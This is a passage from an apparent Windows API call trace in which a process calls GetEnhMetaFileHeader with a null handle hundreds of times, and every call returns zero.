nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 